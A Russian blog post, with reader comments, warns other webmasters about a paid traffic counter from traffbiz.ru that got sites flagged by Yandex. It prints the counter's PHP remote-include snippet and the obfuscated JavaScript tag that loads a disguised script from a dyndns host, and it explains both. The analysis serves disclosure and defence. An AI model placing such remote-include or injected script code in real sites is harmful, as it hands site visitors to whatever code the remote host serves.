Как я поймал вирус на сайт или отзыв о traffbiz.ru

Поздравление ЯндексаВсем привет! Возможно, если вы заходили на atamovich.ru в течении последних двух дней, то ваш браузер предупреждал о том, что сайт угрожает компьютеру и т.д. и т.п. В этой статья я поделюсь своим опытом борьбы с вирусами, если такие завелись у вас на сайте. Правда, «вирус» это не то, что надо было бы употреблять, но для простоты изложения и понимания буду писать именно так.

баннер, который меня завлекЗайдя на блог Михаила Шакина, наткнулся на интересный баннер системы traffbiz.ru. Подумал, мол, Михайл человек проверенный и авторитетный в многих кругах, не стану тратить время на проверку системы, зарегистрируюсь ка сразу и установлю все, что надо к себе на сайт.

Зарегистрировался, изучил систему, установил счетчик. Все вроде бы просто, да не все 😉

Схема такая: устанавливаешь счетчик — получаешь деньги за RU уникальных посетителей. Заманчиво, не правда ли?

На первый взгляд неопытного пользователя код системы выглядит довольно безобидно, всего каких то пару строчек обрамленные php. Разве смогут что-то плохое сделать пару строчек кода? Вирусы же большие и длинные!

Код выглядил вот так:

код каким должен быть

Вот нельзя доверять людям, нельзя. При установке я даже не посмотрел, что значит этот код.
Давайте разберем.
$urlp = «http://all-x.ru/?i=30459&c=5»;
Создаем переменную и присваиваем ей адрес
$code = @file_get_contents($urlp);
Создаем вторую переменную, в которую загружаем все то, что нашли по тому адресу
echo $code;
Выводим вторую переменную с загруженным кодом.

А теперь давайте подумаем. Получается с помощью этого коротенького кода злоумышленник может выводить на сайте все что угодно, собирать информацию о посетителях, собирать пароли, заражать и так далее… Тут только фантазией ограничивается 😉

Смотрим, как этот код отображается на самом деле в исходном коде сайта:

код как есть

Как можете видеть, код «немножко» другой, нежели который мы видели. Оно и понятно, первый же был php-код, а второй уже JS.

Давайте теперь разберем его.

<!—Money counter—>
<script type=»text/javascript»> — тут понятно, обозначаем, что дальше будет идти JavaScript
<!— document.write(‘<sc’ + ‘ript language=»JavaScript» rel=»nofollow» ‘ + ‘src=»http://112zcfhqlb.dyndns.org/30940/counter5.jpg» title=»Money counter» border=»0″ width=»15″ height=»15″></sc’ + ‘ript>’); //—> — выводим текст посредством склеивания отрывков.
</script><!—/Money counter—> — закрывающие теги

document.write() выведет вам все, что вы укажите в скобках. Если текст заключен вот в такие кавычки ‘text’, то выводится строка. + означает склеивание строк.

Итак, что же делает этот скрипт? Он выводит такую строчку: <script language=»JavaScript» rel=»nofollow» src=»http://112zcfhqlb.dyndns.org/30940/counter5.jpg» title=»Money counter» border=»0″ width=»15″ height=»15″></script>

Думаете выводит картинку? А нет! Точнее, да! Но, видимо, не только ее…

Параметр scr в теге <script> указывает, из какого файла загружать программу.


В любом случае, Яндекс считает данный скрипт опасным и «закрывает» сайты, найдя его у вас на странице.


Вам может придти вот такое сообщение:

обнаружен код

При дальнейшем общении с Тех.Поддержкой можно узнать, как выглядит вредоносный код.

После устранения, можно наблюдать вот такую картинку в панели Я.Вебмастера:

Поздравление Яндекса

Я не имею ничего против Михаила или ТраффБиз.ру, со всеми бывает)))

Надеюсь, вы хоть что-то поняли из этого полуночного бреда. Всем спокойной ночи!

Кстати, в скором времени напишу интересный аналитический отчет, так что советую подписаться на RSS 😉

UPD: у Яндекса есть интересная статья по этому поводу, в которой как раз все объясняется!

Ваш Atamovich

Кстати, вы ходите в обычные парикмахерские или в салоны красоты? Если вам нужны салоны красоты в Москве, то прошу последовать по ссылке! Там отличный каталог салонов, с описанием и рейтингом. Не поленитесь, полистайте каталог! Можно ещё и записаться в режиме онлайн!

  • исходя из кода, этот скрипт действительно опасен лишь ПОТЕНЦИАЛЬНО, это всё равно что когда Каспер ругается при нахождении различных кряков и генераторов ключей

  • Вот так да. Но я партнёрки пока не использую. Предпочитаю работать лишь с ссылками.

  • Тем не менее, из-за этого трафик с Яндекса упал почти до нуля…
    Сейчас трафик восстановится, напишу статейку *надеюсь* интересную =)

  • Главное, проверяй все, что ставишь на сайт 😉

  • Я бы точно не смогла разобраться с кодами.

  • Roman

    Вот хотели заработать могли остаться без сайта

  • Вот поэтому и решил написать «предупредительный» пост читателям сайта 😉

  • Во жесть 8-0
    У меня один бложик как то взломали так неделю ковырялся чистил. А тут вроде все чинно-благородно… Настрелять бы по соплям ентим хацкерам фИговым…

  • Так самое обидное, что своими руками код вставлял…

  • Artmix Biz

    я тоже попался — на 2 недели яндекс сайт artmix.biz забанил из-за их счетчика за котоорый плотят!

  • Mailbox

    Yandex через два дня начал ругаться, а Google пока молчит. Посещаемость упала в 2 раза c 800-та человек до 400-та :-((

    На страницах сайта it-master.biz обнаружен код, который может быть опасен для посетителей. Выполнение этого кода может привести к заражению компьютера опасными программами, использованию его без ведома пользователя, порче или краже данных.

    В настоящий момент сайт выводится в результатах поиска с пометкой «Этот сайт может угрожать безопасности вашего компьютера».

    Яндекс никак не оценивает содержание сайта и предупреждает пользователей о том, что сайт мог быть заражен без ведома его владельцев.

    Пожалуйста, удалите вредоносный код. Если при новой проверке код не будет обнаружен, пометка в результатах поиска будет снята. Для того чтобы снять пометку как можно быстрее, сразу после удаления кода вы можете запросить перепроверку сайта.

  • тоже попался WHak.ru

  • стоял код от TRAFBIZ на 5 сайтах около 3 мес. и деньги приносил, а сегодня яндекс сразу все эти сайты прикрыл, пришлось снимать код.

  • Да, я тоже все убрал… Но партнерку оставил:)))

  • У меня по этому поводу произошла интересная ситуация.Две недели назад яндекс сообщил о наличии вредоносного кода на сайте.Проверяла онлайн-антивирусниками — ничего не нашли,после повторной проверки — яндекс подтвердил,что все чисто.Да,за это время естественно посещаемость и так не большая упала в 3 раза.В итоге,все наладилось и только вздохнула с облегчением,как новый поворот.Вновь сообщение о вредоносном коде.Оказывается все дело в счетчике от трафбиза.И теперь возникает вопрос — достаточно ли простого удаления этого кода со страницы,где он был установлен или надо теперь все проверять на наличие,коль он такой хитрый?Посоветуйте,пожалуйста.

  • В теории, он мог оставить что-то на сайте. Но я думаю, что достаточно просто удалить скрипт, а потом проверить весь сайт на вирусы через онлайн сервисы или техподдержку хостинга.

  • Здравствуйте. Примерно такой же код ставится и от beetraf .ru

    Я тоже поймал троян, потом долго чистился.
    Если интересно, можете прочитать о заражении и лечении в статье:

    http:// aviatalker. ru/beetraf-ru-troyan-virus/

    Нет больше доверия к iframe…

  • Не в первый раз убеждаюсь, что не все сети порядочные. Под видом нормального подсовывают обывателям и неопытным-шлак. Вот и работай с ними. Моментально пароли поснимают. негодяи.

  • Убрал код сразу с пяти сайтов, прошло уже 12 дней как подал на перепроверку, а перепроверки все нет и все сайты до сих пор помечены яндексом! Как часто яндекс-тормоз проверяет сайты?

  • У меня в течении 3х дней проверил. Напишите Платону в Яндекс:-)

  • Писал два раза. Присылают шаблонный ответ:

    Если Вы считаете, что сейчас сайты уже не являются опасным для пользователей, пожалуйста, дождитесь, пока антивирус перепроверит их. Для ускорения процесса можно послать сайт на перепроверку вручную через сервис Яндекс.Вебмастер.

  • Хм… может код что-то успел натворить?
    проверьте через он-лайн антивирусы сайт, вдруг там какая-то другая зараза засела.
    Можно попробовать написать техподдержке хостера, может они чего найдут…

  • В панели вебмастера яндекса указано число последней проверки сайтов на вирусы. Это число как было 28 февраля, так до сих пор и остается. Просто нет перепроверок уже так долго.

  • Значит косяк яндекса…
    Помню у них была проблема с чтением карты сайта, и мой сайт отвратительно индексировался. Тоже писали отписками. через 2 месяца исправили втихую:) Теперь норм.
    Так что, думаю, остается только ждать…

  • Похоже,что Яндекс уработался. У меня тоже до сих пор не перепроверено с 28 февраля,не смотря на то,что уже несколько раз писала письма,полный игнор с его стороны.

  • желательно сделать откат на дату предшествующую установке счетчика. Вам поможет служба хостинга.

  • Анастасия

    Я тоже попадалась на это на [ссылка]

© 2017 Atamovich.ru

MAXCACHE: 0.43MB/0.00026 sec